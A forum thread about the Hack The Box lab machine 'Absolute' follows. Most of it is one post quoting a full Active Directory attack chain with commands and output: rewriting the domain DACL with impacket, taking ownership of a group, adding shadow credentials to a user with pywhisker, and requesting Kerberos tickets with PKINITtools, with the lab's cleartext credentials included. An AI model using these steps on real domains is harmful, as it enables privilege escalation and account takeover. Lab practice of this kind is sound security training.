Return to forum
Absolute - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 1
Threads: 0
Joined: N/A
Reputation: 0

#181
November 12, 2022 at 5:36 PM
hmm.. try to get root
Reply
Member
Member
Posts: 24
Threads: 0
Joined: N/A
Reputation: 0

#182
November 22, 2022 at 12:27 AM
(October 22, 2022, 07:23 AM)user_htb22 Wrote:
(October 22, 2022, 06:44 AM)Cipher Wrote: pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"


Searching for the target account
[*]Target user found: CN=winrm_user,CN=Users,DC=absolute,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 2c215242-7760-b763-042c-6331a46961e3
[*]Updating the msDS-KeyCredentialLink attribute of winrm_user
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

[*]
Linux version

> impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Saving ticket in m.lovegod.ccache

> export KRB5CCNAME=m.lovegod.ccache

# Modify group rights to all
> impacket-dacledit absolute.htb/m.lovegod:AbsoluteLDAP2022! -k  -target-dn 'DC=absolute,DC=htb' -dc-ip 10.10.11.181 -action write -rights FullControl -principal 'm.lovegod' -target 'Network Audit'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] DACL backed up to dacledit-20221001-005328.bak
[*] DACL modified successfully!


# Add user to group
> impacket-owneredit  -k absolute.htb/m.lovegod:AbsoluteLDAP2022! -dc-ip 10.10.11.181 -action write -new-owner 'm.lovegod'  -target 'Network Audit'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Current owner information below
[*] - SID: S-1-5-21-4078382237-1492182817-2568127209-1109
[*] - sAMAccountName: m.lovegod
[*] - distinguishedName: CN=m.lovegod,CN=Users,DC=absolute,DC=htb
[*] OwnerSid modified successfully!


# Check if user has been added
> impacket-dacledit absolute.htb/m.lovegod:AbsoluteLDAP2022! -k  -target-dn 'DC=absolute,DC=htb' -dc-ip 10.10.11.181 -action read -principal 'm.lovegod' -target 'Network Audit'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-1109)
[*]   ACE[4] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : m.lovegod (S-1-5-21-4078382237-1492182817-2568127209-1109)
```

Get a pfx file and a password associated with it by [pywisker.py](https://github.com/ShutdownRepo/pywhisker)
``` bash
> impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Saving ticket in m.lovegod.ccache

> export KRB5CCNAME=m.lovegod.ccache

> pywhisker -d absolute.htb -u "m.lovegod" -k  -t "winrm_user" --action "add"  --dc-ip 10.10.11.181
[*] Searching for the target account
[*] Target user found: CN=winrm_user,CN=Users,DC=absolute,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 3a646e2b-da2c-6bc5-6716-29219b234274
[*] Updating the msDS-KeyCredentialLink attribute of winrm_user
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: aVyJ6kyU.pfx
[*] Must be used with password: 5Js2StgOCcksYbL6mujS
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```

Using PKINITtools to get a ticket from the pfx file as follows:
```bash
> gettgtpkinit absolute.htb/winrm_user -cert-pfx aVyJ6kyU.pfx -pfx-pass 5Js2StgOCcksYbL6mujS winrm_user.ccache
2022-10-01 04:02:38,634 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2022-10-01 04:02:38,650 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2022-10-01 04:03:03,267 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2022-10-01 04:03:03,268 minikerberos INFO     f03aa48a1fd1f4855630bdc817105408373be6baa60939f3adf4160bbd704d89
INFO:minikerberos:f03aa48a1fd1f4855630bdc817105408373be6baa60939f3adf4160bbd704d89
2022-10-01 04:03:03,276 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file


[*]
Any ideas why this isn't playing ball? What ever I do I always get the "INSUFF_ACCESS_RIGHTS" on the last command
[*]
python3 impacket/examples/dacledit.py absolute.htb/m.lovegod:AbsoluteLDAP2022! -k -target-dn 'DC=absolute,DC=htb' -dc-ip 10.129.x.x -action write -rights FullControl -principal 'm.lovegod' -target 'Network Audit'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*]DACL backed up to dacledit-20221122-070823.bak
[*]DACL modified successfully!
python3 impacket/examples/owneredit.py  -k absolute.htb/m.lovegod:AbsoluteLDAP2022! -dc-ip 10.129.x.x -action write -new-owner 'm.lovegod'  -target 'Network Audit'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*]Current owner information below
[*]- SID: S-1-5-21-4078382237-1492182817-2568127209-1109
[*]- sAMAccountName: m.lovegod
[*]- distinguishedName: CN=m.lovegod,CN=Users,DC=absolute,DC=htb
[*]OwnerSid modified successfully!
python3 impacket/examples/dacledit.py absolute.htb/m.lovegod:AbsoluteLDAP2022! -k -target-dn 'DC=absolute,DC=htb' -dc-ip 10.129.x.x -action read -principal 'm.lovegod' -target 'Network Audit'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*]Parsing DACL
[*]Printing parsed DACL
[*]Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-1109)
[*]  ACE[4] info               
[*]    ACE Type                  : ACCESS_ALLOWED_ACE
[*]    ACE flags                : None
[*]    Access mask              : FullControl (0xf01ff)
[*]    Trustee (SID)            : m.lovegod (S-1-5-21-4078382237-1492182817-2568127209-1109)
[*]
getTGT.py "absolute.htb/m.lovegod:AbsoluteLDAP2022!"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*]Saving ticket in m.lovegod.ccache
export KRB5CCNAME=m.lovegod.ccache
python3 /opt/pywhisker/pywhisker.py -d ABSOLUTE.HTB -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add" --dc-ip 10.129.x.x
[*]Searching for the target account
[*]Target user found: CN=winrm_user,CN=Users,DC=absolute,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: e558bb9c-1e09-0734-892a-75764dd7a283
[*]Updating the msDS-KeyCredentialLink attribute of winrm_user
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
Reply
Member
Member
Posts: 11
Threads: 0
Joined: N/A
Reputation: 0

#183
November 24, 2022 at 5:53 AM
(September 26, 2022, 09:19 PM)ThatUsername Wrote:
(September 25, 2022, 06:03 PM)jahman Wrote: Hello,

Via bloodhound :  m.lovegod -- OWNS --> Group Network Audit -- Generic Write --> winrm_user


How did you collected the data? With every version of Bloodhound ingestor i ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

 Thanks
Reply
Member
Member
Posts: 2
Threads: 0
Joined: N/A
Reputation: 0

#184
November 27, 2022 at 12:14 PM
(September 29, 2022, 12:37 PM)ThatUsername Wrote: Sure,

on my WinRM Session i uploaded these files


files check xD
Reply
Member
Member
Posts: 7
Threads: 0
Joined: N/A
Reputation: 0

#185
November 28, 2022 at 5:17 AM
(September 29, 2022, 12:37 PM)ThatUsername Wrote: awd
Reply


 Users viewing this thread: Absolute - HTB [Discussion]: No users currently viewing.